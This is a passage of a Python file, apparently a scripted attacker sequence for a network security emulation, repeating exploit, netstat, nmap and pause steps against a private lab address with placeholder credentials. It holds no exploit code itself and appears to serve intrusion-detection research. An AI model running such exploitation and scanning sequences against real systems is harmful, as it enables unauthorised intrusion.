            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=20, pause=0), 1), (PauseStep(),),
            (NetstatRecStep(0), 1), (PauseStep(),), (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
            (SlashCharExploit("10.0.0.10", "client4", "pass4", mean_duration=120, pause=0), 1), (PauseStep(),),
            (Nmap10T4RecStep(0),), (PauseStep(),),
